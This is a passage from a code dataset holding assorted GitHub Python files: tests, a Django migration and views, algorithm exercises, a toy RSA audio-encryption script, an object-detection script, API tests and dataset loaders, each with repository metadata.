= mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n ts = [\n threading.Thread(target=lambda: self.wait(latch, wait_recv))\n for x in range(5)\n ]\n for t in ts:\n t.start()\n wait_recv.close()\n def throw():\n raise latch.get()\n for x in range(5):\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n for t in ts:\n t.join()\n\n\nclass OnReceiveTest(testlib.RouterMixin, testlib.TestCase):\n # Verify behaviour of _on_receive dead message handling. A dead message\n # should unregister the receiver and wake all threads.\n\n def wait(self, latch, wait_recv):\n try:\n latch.put(wait_recv.get())\n except Exception:\n latch.put(sys.exc_info()[1])\n\n def test_sender_closes_one_thread(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n t = threading.Thread(target=lambda: self.wait(latch, wait_recv))\n t.start()\n sender = wait_recv.to_sender()\n sender.close()\n def throw():\n raise latch.get()\n t.join()\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], sender.explicit_close_msg)\n\n @unittest.skip(reason=(\n 'Unclear if a asingle dead message received from remote should '\n 'cause all threads to wake up.'\n ))\n def test_sender_closes_all_threads(self):\n latch = mitogen.core.Latch()\n wait_recv = mitogen.core.Receiver(self.router)\n ts = [\n threading.Thread(target=lambda: self.wait(latch, wait_recv))\n for x in range(5)\n ]\n for t in ts:\n t.start()\n sender = wait_recv.to_sender()\n sender.close()\n def throw():\n raise latch.get()\n for x in range(5):\n e = self.assertRaises(mitogen.core.ChannelError, throw)\n self.assertEqual(e.args[0], mitogen.core.Receiver.closed_msg)\n for t in ts:\n t.join()\n\n # TODO: what happens to a Select subscribed to the receiver in this case?\n\n\nclass ToSenderTest(testlib.RouterMixin, testlib.TestCase):\n klass = mitogen.core.Receiver\n\n def test_returned_context(self):\n myself = self.router.myself()\n recv = self.klass(self.router)\n self.assertEqual(myself, recv.to_sender().context)\n","repo_name":"mitogen-hq/mitogen","sub_path":"tests/receiver_test.py","file_name":"receiver_test.py","file_ext":"py","file_size_in_byte":4794,"program_lang":"python","lang":"en","doc_type":"code","stars":2100,"dataset":"github-code","pt":"29"} +{"seq_id":"10076267192","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('cluster', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='cluster',\n name='persistent',\n field=models.IntegerField(null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"ZUNbado/lbmanager","sub_path":"apps/cluster/migrations/0002_auto_20150216_1623.py","file_name":"0002_auto_20150216_1623.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"27786342186","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\narr.insert(0, 0)\ndy = [0] * (N+1)\ndy[1] = 1\nres = 0\nfor i in range(2, N+1):\n maximum = 0\n for j in range(i-1, 0, -1):\n if arr[j] < arr[i] and dy[j] > maximum:\n maximum = dy[j]\n dy[i] = maximum+1\n if dy[i] > res:\n res = dy[i]\nif N == 1:\n print(1)\nelse:\n print(res)","repo_name":"Hin1209/PS","sub_path":"JJUN/WEEK05/BOJ11503가장긴증가하는부분수열_JUN.py","file_name":"BOJ11503가장긴증가하는부분수열_JUN.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"72118358477","text":"lista = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\ndados = []\nlinha2 = []\ncoluna3 = []\nfor linha in range(0, 3):\n for coluna in range(0, 3):\n lista[linha][coluna] = int(input(f'Digite um numero para posição [{linha},{coluna}] '))\nfor linha in range(0, 3):\n for coluna in range(0, 3):\n print(f'[{lista[linha][coluna]:^5}]', end='')\n print()\nfor sub in lista:\n for num in sub:\n dados.append(num)\ns = 0\nfor c in dados:\n if c % 2 == 0:\n s = s + c\nfor l2 in lista[1]:\n linha2.append(l2)\ns3 = 0\nfor i in range(0, 3):\n coluna3.append(lista[i][2])\n s3 = s3 + lista[i][2]\n\nprint(f'A soma dos valores pares é {s}.')\nprint(f'A soma dos valores da terceria coluna é {s3}.')\nprint(f'O maior valor da segunda linha é {max(linha2)}.')\n","repo_name":"BrunoIaneczek/Estudo-na-linguagem-Python","sub_path":"Python_exercicios/Exercício_87_Mais_sobre_matriz_em_python.py","file_name":"Exercício_87_Mais_sobre_matriz_em_python.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"19542971683","text":"from abc import ABC, abstractmethod\n\nfrom PIL import Image\nfrom qdrant_client.grpc import ScoredPoint\n\nfrom common.consts import PROJECT_PATH\nfrom metrics.consts import MetricCollections\n\n\nclass EnvFunctionHandler(ABC):\n \"\"\"\n Base class for listing shared methods.\n \"\"\"\n\n local_data_dir = PROJECT_PATH / \"data\"\n local_models_dir = local_data_dir / \"models\"\n local_metric_datasets_dir = local_data_dir / \"metric_datasets\"\n\n @abstractmethod\n def get_best_score_imgs(self, results: list[ScoredPoint]) -> list[Image.Image]:\n \"\"\"\n Handler for returning images with the highest similarity scores from env storage.\n Additionally, filenames are returned as future captions in front-end module.\n \"\"\"\n\n @abstractmethod\n def get_random_images_from_collection(\n self, collection_name: MetricCollections, k: int\n ) -> tuple[list[str], list[Image.Image]]:\n \"\"\"\n Pulls a random set of images from a selected collection in env storage.\n Used for image input suggestion in front-end component.\n Additionally, filenames are returned as captions.\n \"\"\"\n\n @abstractmethod\n def get_meta_json(\n self, collection_name: MetricCollections\n ) -> dict[str, list[int] | str]:\n \"\"\"\n Get meta.json dictionary created during model training from env storage.\n \"\"\"\n","repo_name":"stxnext/visual-similarity-search","sub_path":"common/handler_env.py","file_name":"handler_env.py","file_ext":"py","file_size_in_byte":1371,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"29"} +{"seq_id":"19638474676","text":"#!/usr/bin/python3\n\"\"\" Quick & dirty utility to check parsing of various server JSON files\n\"\"\"\n\nimport sys\nimport json\nfrom pykumo import KumoCloudAccount, PyKumoStation\n\ndef main():\n \"\"\" Entry point\n \"\"\"\n filename = sys.argv[1]\n file = open(filename)\n kumo_json = json.load(file)\n account = KumoCloudAccount(None, None, kumo_dict=kumo_json)\n units = account.get_all_units()\n print(\"Units: %s\" % str(units))\n for unit in units:\n print(\"Unit %s: address: %s credentials: %s\" %\n (account.get_name(unit), account.get_address(unit),\n account.get_credentials(unit)))\n # Optional script to test fetching data from the units\n # kumos = account.make_pykumos()\n # for kumoName in kumos:\n # if isinstance(kumos[kumoName], PyKumoStation):\n # print(\"Kumo Station Outdoor Temp: %s\" % (kumos[kumoName].get_outdoor_temperature()))\n # else:\n # print(\"Indoor Unit %s Current Temp: %s\" % (kumoName, kumos[kumoName].get_current_temperature()))\n\nif __name__ == '__main__':\n main()\n","repo_name":"dlarrick/pykumo","sub_path":"server_parser.py","file_name":"server_parser.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"29"} +{"seq_id":"9664301695","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, logout, authenticate\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.db import IntegrityError\nfrom django.http.response import HttpResponse\nfrom django.urls import reverse\nfrom django.contrib.auth.decorators import login_required\n\nfrom pathlib import Path\nimport os\nimport environ\nimport threading\nimport pyrebase\n\nfrom .forms import UserCreationForm, UserMediaDetailsForm\nfrom .models import UserMediaDetails\nfrom . import constants\n\n# Create your views here.\n\n\ndef signup(req):\n if req.method == 'GET':\n return render(req, 'users/signup.html', context={'form': UserCreationForm()})\n else:\n if req.POST['password1'] == req.POST['password2']:\n try:\n user = User.objects.create_user(\n username=req.POST['username'],\n password=req.POST['password1'], \n email=req.POST['email'],\n first_name=req.POST['first_name'],\n last_name=req.POST['last_name'])\n user.save()\n login(req, user)\n return redirect('users:view_profile')\n except IntegrityError:\n return render(req, 'users/signup.html', \n {'form': UserCreationForm(), 'error': constants.USERNAME_TAKEN})\n else:\n return render(req, 'users/signup.html', \n {'form': UserCreationForm(), 'error': constants.PASSWORDS_DONT_MATCH})\n\n\ndef signin(req):\n if req.method == 'GET':\n return render(req, 'users/signin.html', {'form': AuthenticationForm()})\n else:\n user = authenticate(req, username=req.POST['username'], password=req.POST['password'])\n if user is None:\n return render(req, 'users/signin.html', \n {'form': AuthenticationForm(), 'error': constants.LOGIN_FAIL})\n else:\n login(req, user)\n return redirect('users:view_profile')\n\n@login_required\ndef logoutuser(req):\n if req.method == 'POST':\n logout(req)\n return redirect('landing')\n\n@login_required\ndef view_profile(req):\n if req.method == 'GET':\n target_user_details = UserMediaDetails.objects.filter(user_id=req.user.id)\n\n img_url = None\n \n if len(target_user_details) > 0:\n img_url = target_user_details[0].uploaded_image.url\n return render(req, 'users/profile.html', {'form': UserMediaDetailsForm(instance=target_user_details[0]), 'img_url': img_url})\n\n return render(req, 'users/profile.html', {'form': UserMediaDetailsForm(), 'img_url': img_url})\n else:\n form = UserMediaDetailsForm(req.POST, req.FILES)\n if form.is_valid():\n user_details = form.save(commit=False)\n user_details.user_id = req.user\n\n user_details.save()\n\n firebase_image_storage(req.user.username, user_details.uploaded_image.url, req.user.id)\n\n return redirect(reverse('users:view_profile'))\n else:\n return render(req, 'users/profile.html', \n {'form': UserMediaDetailsForm(), 'error' : 'Form data invalid'})\n\n\ndef firebase_image_storage(user_name, file_path, pk):\n thread_task = threading.Thread(target=firebase_image_storage_helper, args=[file_path, user_name, pk])\n thread_task.setDaemon(True)\n thread_task.start()\n\n\ndef firebase_image_storage_helper(file_path, user_name, pk):\n env = environ.Env()\n environ.Env.read_env()\n\n firebase = pyrebase.initialize_app({\n \"apiKey\": env('API_KEY'),\n \"authDomain\": env('AUTH_DOMAIN'),\n \"projectId\": env('PROJECT_ID'),\n \"storageBucket\": env('STORAGE_BUCKET'),\n \"messagingSenderId\": env('MESSAGING_SENDER_ID'),\n \"appId\": env('APP_ID'),\n \"measurementId\": env('MEASUREMENT_ID'),\n \"databaseURL\": \"\"\n })\n storage = firebase.storage()\n BASE_DIR = str(os.path.dirname(os.path.realpath(__file__)))\n BASE_DIR = BASE_DIR[:BASE_DIR.rfind('\\\\')]\n file_path = str(file_path).replace('/', '\\\\')\n full_path = BASE_DIR + file_path\n\n rvalue = storage.child(f\"profile_images/{user_name}.jpg\").put(full_path)\n\n download_link = f\"{env('DOWNLOAD_BASE_URL')}{user_name}.jpg?alt=media&token={rvalue['downloadTokens']}\"\n\n print('the download link is', download_link)\n\n user_details = UserMediaDetails.objects.filter(user_id=pk)[0]\n user_details.image_url = download_link\n user_details.save()","repo_name":"Kartik2301/Recurrence","sub_path":"Backend/tripper/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20255237959","text":"import math\nimport random\nfrom scipy.io import wavfile\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport sounddevice as sd\n\nfs, data = wavfile.read('utkarsh_audio.wav')\nplt.plot(data) # fs = sampling frequency = 44.1kHz\nplt.title(\"Original Audio Plot\")\ndata_1 = np.asarray(data, dtype = np.int32)\n\np1 = int(input(\"Enter a prime number: \"))\np2 = int(input(\"Enter another prime number: \"))\n\nn = p1*p2\nphi = (p1-1)*(p2-1)\n\ndef generate_e(phi):\n possible_e_values = []\n for i in range(2, phi):\n if math.gcd(i, phi) == 1:\n e = i\n possible_e_values.append(e)\n return random.choice(possible_e_values)\n\ne = generate_e(phi)\n\ndef gcdExtended(E,t):\n a1,a2,b1,b2,d1,d2=1,0,0,1,t,E\n\n while d2!=1:\n\n # k\n k=(d1//d2)\n\n #a\n temp=a2\n a2=a1-(a2*k)\n a1=temp\n\n #b\n temp=b2\n b2=b1-(b2*k)\n b1=temp\n\n #d\n temp=d2\n d2=d1-(d2*k)\n d1=temp\n\n D=b2\n\n if D>t:\n D=D%t\n elif D<0:\n D=D+t\n\n return D\n\n\nd=gcdExtended(e,phi)\nprint(d)\n\npublic_key = n,e\nprivate_key = n,d\n\nprint(\"Public Key = \", public_key)\nprint(\"Private Key = \",private_key)\n\n\"\"\"## Encrpytion of audio file\"\"\"\n\nencrypted = (data**e)%n\nplt.plot(encrypted)\nplt.title(\"Encrypted Audio Plot\")\n\nencrypted = np.asarray(encrypted, dtype=np.int16)\nwavfile.write('encrypted_rsa.wav', fs, encrypted)\n#print(\"A file titled 'encrypted_rsa.wav' is generated which is the encrypted audio to be communicated\")\n\n\"\"\"## Loading and decrypting\"\"\"\n\nfs, Data = wavfile.read('encrypted_rsa.wav')\nplt.plot(Data)\nplt.title(\"Encrypted Audio Plot\")\n\n\"\"\"## Decryption of data\"\"\"\n\ndecrypted = (Data**d)%n\nplt.plot(decrypted)\nplt.title('Decrypted Audio Plot')\n\n","repo_name":"Rattin99/Security_project_back","sub_path":"rsa_audio_final.py","file_name":"rsa_audio_final.py","file_ext":"py","file_size_in_byte":1676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"20930850372","text":"import csv\nimport numpy as np\nfrom itertools import chain, combinations\n\nMAX_COMBO = 5\n\n\ndef powerset(iterable):\n s = list(iterable)\n return chain.from_iterable(combinations(s, r) for r in range(MAX_COMBO+1))\n\n\n# 데이터 로딩\nsource = []\nsource_value = []\nsource_title = []\n\ntarget = []\ntarget_value = []\ntarget_title = []\n\nwith open(\"source_cutting.csv\", encoding=\"utf-8\") as source_file:\n rows = csv.reader(source_file, delimiter=\",\")\n for row in rows:\n source.append(row)\n source.pop(0)\n source = sorted(source, key=lambda x: x[1])\n source = np.array(source)\n\nwith open(\"target_cutting.csv\", encoding=\"utf-8\") as source_file:\n rows = csv.reader(source_file, delimiter=\",\")\n for row in rows:\n target.append(row)\n target.pop(0)\n target = sorted(target, key=lambda x: x[1])\n target = np.array(target)\n\n# 데이터 변환 (분리, 문자->숫자)\nsource_title = source.T[0]\nsource_value = source.T[1].astype(\"int\")\ntarget_title = target.T[0]\ntarget_value = target.T[1].astype(\"int\")\n\nfor i, goal in enumerate(target_value, 1):\n used_source = source_value[source_value <= goal]\n print(\"============ {}/{} ============\".format(i, len(target_value)))\n print(\"target : {}\".format(goal))\n print(\"source : {}/{}\".format(len(used_source), len(source_value)))\n\n counter = 0\n for i, combo in enumerate(powerset(used_source), 1):\n result = sum(combo)\n if result == goal:\n counter += 1\n # print(\"#{:5d} {}\".format(i, combo))\n print(\"total {} found!\".format(counter))\n # break","repo_name":"JungWinter/study","sub_path":"Python/Misc/subset_sum/subset_sum_2.py","file_name":"subset_sum_2.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"29"} +{"seq_id":"5975701135","text":"def monotonicStack(nums):\n n = len(nums)\n stack = []\n \n for i in range(n):\n while len(stack) > 0 and stack[-1] >= nums[i]:\n stack.pop()\n \n stack.append(nums[i])\n \n return stack\n\n\nnums = [2, 3, 7, 24, 4, 6, 19]\nprint(monotonicStack(nums))\n\nclass Solution:\n def dailyTemperatures(self, temp):\n st = []\n n = len(temp)\n answer = [0] * n\n\n for i in range(n):\n while st and temp[st[-1]] < temp[i]:\n print(\"stack\", st, \"i\", i)\n answer[st[-1]] = i - st[-1]\n print(\"answer\", answer)\n st.pop()\n st.append(i)\n return answer\n \ns = Solution()\nprint(s.dailyTemperatures(nums))\n\n# Monotonic Stack\n\n# # naive Solution: time out for some cases\n\n# class Solution:\n# def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n# if len(temperatures) == 1:\n# return [0]\n# res = []\n# i = 0\n# for i in range(len(temperatures)):\n# interval = 1\n# j = i+1\n # while j < len(temperatures) and temperatures[j] <= temperatures[i]:\n # j += 1\n # interval +=1\n \n # if j == len(temperatures):\n # res.append(0)\n # else:\n # # print(res)\n # res.append(interval)\n # return res\n\n\n# solution 2\n# class Solution:\n# def dailyTemperatures(self, temperatures: List[int]) -> List[int]:\n# res = [0] * len(temperatures)\n# stack = []\n# for index, temp in enumerate(temperatures):\n# while stack and temperatures[stack[-1]] < temp:\n# prev_day = stack.pop()\n# res[prev_day] = index - prev_day\n# stack.append(index)\n# return res\n\nclass Solution:\n def dailyTemperatures(self, temp: List[int]) -> List[int]:\n stack = []\n res = [0] * len(temp)\n for i in range(len(temp)):\n while stack and temp[stack[-1]] < temp[i]:\n res[stack[-1]] = i - stack[-1]\n stack.pop()\n stack.append(i)\n return res\n# time complexity: O(N): each element can only be added to the stack once, which means the stack is limited to NNN pops. \n\n# Space complexity: O(N): If the input was non-increasing, then no element would ever be popped from the stack, and the stack would grow to a size of N elements at the end.\n\n# Note: answer does not count towards the space complexity because space used for the output format does not count.\n","repo_name":"huifeng248/coding_problem_practice","sub_path":"Leetcode/739_monotonic_stack.py","file_name":"739_monotonic_stack.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5072810792","text":"######## Image Object Detection Using Tensorflow-trained Classifier #########\r\n#\r\n# Author: Evan Juras\r\n# Date: 1/15/18\r\n# Description: \r\n# This program uses a TensorFlow-trained classifier to perform object detection.\r\n# It loads the classifier uses it to perform object detection on an image.\r\n# It draws boxes and scores around the objects of interest in the image.\r\n\r\n## Some of the code is copied from Google's example at\r\n## https://github.com/tensorflow/models/blob/master/research/object_detection/object_detection_tutorial.ipynb\r\n\r\n## and some is copied from Dat Tran's example at\r\n## https://github.com/datitran/object_detector_app/blob/master/object_detection_app.py\r\n\r\n## but I changed it to make it more understandable to me.\r\n\r\n# Import packages\r\nimport os\r\nimport cv2\r\nimport numpy as np\r\nimport tensorflow as tf\r\nimport sys\r\nfrom operator import itemgetter\r\nimport csv\r\n\r\n\r\n# This is needed since the notebook is stored in the object_detection folder.\r\nsys.path.append(\"..\")\r\n\r\n# Import utilites\r\nfrom utils import label_map_util\r\nfrom utils import visualization_utils as vis_util\r\n\r\n# Name of the directory containing the object detection module we're using\r\nMODEL_NAME = 'inference_graph'\r\n\r\n# Grab path to current working directory\r\nCWD_PATH = os.getcwd()\r\n\r\n# Path to frozen detection graph .pb file, which contains the model that is used\r\n# for object detection.\r\nPATH_TO_CKPT = os.path.join(CWD_PATH,MODEL_NAME,'frozen_inference_graph.pb')\r\n\r\n# Path to label map file\r\nPATH_TO_LABELS = os.path.join(CWD_PATH,'training','labelmap.pbtxt')\r\n\r\n# Path to image\r\nIMAGE_FOLDER = 'target_images'\r\nPATH_TO_IMAGE = os.path.join(CWD_PATH,IMAGE_FOLDER)\r\n\r\n# Number of classes the object detector can identify\r\nNUM_CLASSES = 6\r\n\r\n# Load the label map.\r\n# Label maps map indices to category names, so that when our convolution\r\n# network predicts `5`, we know that this corresponds to `king`.\r\n# Here we use internal utility functions, but anything that returns a\r\n# dictionary mapping integers to appropriate string labels would be fine\r\nlabel_map = label_map_util.load_labelmap(PATH_TO_LABELS)\r\ncategories = label_map_util.convert_label_map_to_categories(label_map, max_num_classes=NUM_CLASSES, use_display_name=True)\r\ncategory_index = label_map_util.create_category_index(categories)\r\ncategory_name = [categories[i]['name'] for i in range(len(categories))]\r\nempty_list = [\"image\"]\r\ncategory_name_header = empty_list + category_name\r\n\r\n\r\n# Load the Tensorflow model into memory.\r\ndetection_graph = tf.Graph()\r\nwith detection_graph.as_default():\r\n od_graph_def = tf.GraphDef()\r\n with tf.gfile.GFile(PATH_TO_CKPT, 'rb') as fid:\r\n serialized_graph = fid.read()\r\n od_graph_def.ParseFromString(serialized_graph)\r\n tf.import_graph_def(od_graph_def, name='')\r\n\r\n sess = tf.Session(graph=detection_graph)\r\n\r\n# Define input and output tensors (i.e. data) for the object detection classifier\r\n\r\n# Input tensor is the image\r\nimage_tensor = detection_graph.get_tensor_by_name('image_tensor:0')\r\n\r\n# Output tensors are the detection boxes, scores, and classes\r\n# Each box represents a part of the image where a particular object was detected\r\ndetection_boxes = detection_graph.get_tensor_by_name('detection_boxes:0')\r\n\r\n# Each score represents level of confidence for each of the objects.\r\n# The score is shown on the result image, together with the class label.\r\ndetection_scores = detection_graph.get_tensor_by_name('detection_scores:0')\r\ndetection_classes = detection_graph.get_tensor_by_name('detection_classes:0')\r\n\r\n# Number of objects detected\r\nnum_detections = detection_graph.get_tensor_by_name('num_detections:0')\r\n\r\n# Minimum score threshold for a box to be visualized \r\nMIN_SCORE = 0.80\r\n\r\n# Export the detected objects to csv --- --- --- --- --- --- --- --- --- --- --- ---\r\n\r\n# Create function that outputs detected objects to csv\r\ndef export_object_csv(filename):\r\n\r\n # Get an image in the folder\r\n image_directory = os.path.join(PATH_TO_IMAGE,filename)\r\n image = cv2.imread(image_directory)\r\n image_expanded = np.expand_dims(image, axis=0)\r\n\r\n # Perform the actual detection by running the model with the image as input\r\n (boxes, scores, classes, num) = sess.run(\r\n [detection_boxes, detection_scores, detection_classes, num_detections],\r\n feed_dict={image_tensor: image_expanded})\r\n\r\n # Export detectd categories to csv\r\n detected_index = [ n for n,i in enumerate(np.squeeze(scores)) if i>MIN_SCORE ]\r\n detected_class = itemgetter(*detected_index)(np.squeeze(classes).astype(np.int32))\r\n \r\n # If the image contains only one object, need to convert int to tuple\r\n if type(detected_class) is not tuple:\r\n detected_class = (detected_class,)\r\n\r\n detected_category = [category_index[x]['name'] for x in detected_class]\r\n print(detected_category)\r\n\r\n # Create a row that shows how many objets are in the image\r\n objects_count = [detected_category.count(category_name[i]) for i in range(len(category_name))]\r\n detected_objects_row = [filename] + objects_count\r\n\r\n with open('detected_object.csv', 'a') as output_csvfile:\r\n output_csvfile_writer = csv.writer(output_csvfile)\r\n output_csvfile_writer.writerow(detected_objects_row)\r\n\r\n# Create a new empty detected_object.csv\r\nwith open(\"detected_object.csv\", \"w\") as output_csv:\r\n writer = csv.writer(output_csv)\r\n writer.writerow(category_name_header)\r\n\r\n# Run export_object_csv for each image in the folder\r\nfor filename in os.listdir(PATH_TO_IMAGE):\r\n if not filename.startswith('.') and os.path.isfile(os.path.join(PATH_TO_IMAGE, filename)):\r\n export_object_csv(filename)\r\n\r\n\r\n\r\n# Draw the results on images --- --- --- --- --- --- --- --- --- --- --- --- --- ---\r\n\r\n# Draw the results of the detection (aka 'visulaize the results')\r\n\r\n# vis_util.visualize_boxes_and_labels_on_image_array(\r\n# image,\r\n# np.squeeze(boxes),\r\n# np.squeeze(classes).astype(np.int32),\r\n# np.squeeze(scores),\r\n# category_index,\r\n# use_normalized_coordinates=True,\r\n# line_thickness=8,\r\n# min_score_thresh=MIN_SCORE)\r\n\r\n# All the results have been drawn on image. Now display the image.\r\n# cv2.imshow('Object detector', image)\r\n\r\n# Press any key to close the image\r\n# cv2.waitKey(0)\r\n\r\n# Clean up\r\n# cv2.destroyAllWindows()\r\n","repo_name":"soma11soma11/object_detection","sub_path":"Object_detection_image.py","file_name":"Object_detection_image.py","file_ext":"py","file_size_in_byte":6328,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"29"} +{"seq_id":"70703493838","text":"import json\nimport allure\nfrom requests import Response\nfrom Utils.Cheking import Checking\nfrom Utils.api import Swagger_petshop_api\n\"\"\"Создание, изменение и удаление нового пета\"\"\"\n@allure.epic(\"Test petstore\")\nclass Test_create_pet():\n @allure.description(\"Test create, update, delete new pet\")\n def test_add_new_pet(self):\n\n print(\" Метод POST\")\n result_post: Response = Swagger_petshop_api.add_new_pet()\n check_post = result_post.json()\n id = check_post.get(\"id\")\n token=json.loads(result_post.text)\n print(list(token))\n Checking.check_status_code(result_post, 200)\n Checking.check_json_token(result_post, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n Checking.check_json_value(result_post, 'status', 'available')\n\n print(\" Метод GET POST\")\n result_get: Response = Swagger_petshop_api.get_add_pet(id)\n Checking.check_status_code(result_get, 200)\n token = json.loads(result_get.text)\n print(list(token))\n Checking.check_json_token(result_get, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n Checking.check_json_value(result_get, 'status', 'available')\n Checking.check_json_value(result_get, 'name', 'doggie')\n\n print(\" Метод PUT\")\n result_put: Response = Swagger_petshop_api.put_add_pet(id)\n token = json.loads(result_put.text)\n print(list(token))\n Checking.check_status_code(result_put, 200)\n Checking.check_json_token(result_put, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n Checking.check_json_value(result_put, 'name', 'doggie')\n Checking.check_json_value(result_put, 'status', 'pending')\n\n print(\" Метод GET PUT\")\n result_get: Response = Swagger_petshop_api.get_add_pet(id)\n Checking.check_status_code(result_get, 200)\n Checking.check_json_token(result_get, ['id', 'category', 'name', 'photoUrls', 'tags', 'status'])\n Checking.check_json_value(result_get, 'status', 'pending')\n\n print(\" Метод DELETE\")\n result_delete: Response = Swagger_petshop_api.delete_new_pet(id)\n Checking.check_status_code(result_delete, 200)\n token = json.loads(result_delete.text)\n print(list(token))\n Checking.check_json_token(result_delete, ['code', 'type', 'message'])\n Checking.check_json_value(result_delete, 'type', 'unknown')\n\n print(\" Метод GET DELETE\")\n result_get: Response = Swagger_petshop_api.get_add_pet(id)\n Checking.check_status_code(result_get, 404)\n token = json.loads(result_get.text)\n print(list(token))\n Checking.check_json_token(result_get, ['code', 'type', 'message'])\n Checking.check_json_search_word_in_value(result_get, 'message', 'Pet not found')\n\n print(\"Тестирование создания, изменения и удаления нового пета прошло успешно\")","repo_name":"Offersa/test_swagger_petshop","sub_path":"Tests/test_swagger_petshop.py","file_name":"test_swagger_petshop.py","file_ext":"py","file_size_in_byte":3105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70386939280","text":"import os\nimport pandas as pd\n\nfrom torchvision.datasets import ImageFolder\n\nfrom .datasets import register\n\n\n@register('mini_imagenet')\nclass MiniImageNet:\n \"\"\"\n data structure of 'mini-imagenet':\n -| miniImageNet\n ---| images\n -----| n0153282900000005.jpg\n -----| n0153282900000006.jpg\n -----| n0153282900000007.jpg\n -----| ...\n ---| labels\n -----| fold0_train.csv\n -----| fold0_val.csv\n -----| ...\n ---| train.csv\n ---| val.csv\n ---| test.csv\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(MiniImageNet, self).__init__()\n self.data = []\n self.label = []\n if fold != -1:\n data_split = os.path.join(data_path, 'labels')\n data_split += '/fold' + str(fold) + '_' + split + '.csv'\n else: \n data_split = data_path + '/' + split + '.csv'\n data_list = pd.read_csv(data_split)\n data_list = data_list.values.tolist()\n\n for d in data_list:\n img = os.path.join(data_path, 'images', d[0]) # image path\n self.data.append(img)\n self.label.append(d[1])\n self.label_idx = convertLabel(self.label) # convert string label to index\n \n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n\n def getData(self):\n return self.data, self.label_idx # return data/label path list\n\n\n@register('tiered_imagenet')\nclass TieredImageNet:\n \"\"\"\n data structure of 'tiered-imagenet':\n -| tieredImageNet\n ---| train\n -----| n01530575\n -------| n0153057500000001.jpg\n -------| ...\n -----| n01531178\n -------| ...\n ---| val\n ---| test\n ---| train.csv\n ---| val.csv\n ---| test.csv\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(TieredImageNet, self).__init__()\n self.data = []\n self.label = []\n \n data_split = data_path + '/' + split + '.csv'\n data_list = pd.read_csv(data_split)\n data_list = data_list.values.tolist()\n\n for d in data_list:\n img = os.path.join(data_path, split, d[1], d[0]) # image path\n self.data.append(img)\n self.label.append(d[1])\n self.label_idx = convertLabel(self.label) # convert string label to index\n \n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n\n def getData(self):\n return self.data, self.label_idx # return data/label path list\n\n\n@register('omniglot')\nclass Omniglot:\n \"\"\"\n data structure of 'omniglot':\n -| Omniglot\n ---| Alphabet_of_the_Magi (super-class 1)\n -----| character01\n -------| 0709_01.png\n -------| 0709_02.png\n -------| ...\n -----| character02\n -----| ...\n ---| Angelic (super-class 2)\n -------| ...\n \"\"\"\n def __init__(self, data_path, split='train', fold=-1):\n super(Omniglot, self).__init__()\n self.data = []\n self.label = []\n\n data_cls_split = data_path + '/' + split + '.csv'\n data_cls_list = pd.read_csv(data_cls_split)\n data_cls_list = data_cls_list.values.tolist()\n\n for d in data_cls_list:\n img_path = os.path.join(data_path, 'data', d[0])\n self.data.append(img_path)\n self.label.append(d[1])\n \n self.label_idx = convertLabel(self.label)\n\n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n \n def getData(self):\n return self.data, self.label_idx\n\n\n@register('cub')\nclass CUB2011:\n \"\"\"\n CUB-200-2011, fine-grained classification.\n \"\"\"\n def __init__(self, data_path, split='train'):\n super(CUB2011, self).__init__()\n self.data = []\n self.label = []\n\n data_path = data_path + '/images'\n label_list = os.listdir(data_path)\n for label in label_list:\n images_path = os.path.join(data_path, label)\n images_list = os.listdir(images_path)\n for img in images_list:\n img_path = os.path.join(images_path, img)\n self.data.append(img_path)\n self.label.append(label)\n\n self.label_idx = convertLabel(self.label)\n\n def getLabel(self):\n self.label_str = idx2label(self.label)\n return self.label_str\n \n def getData(self):\n return self.data, self.label_idx\n\n\ndef idx2label(label):\n label_str = {}\n num = len(label)\n k = 0\n for i in range(num):\n if i == 0:\n label_str[i] = label[i]\n else:\n if label[i] != 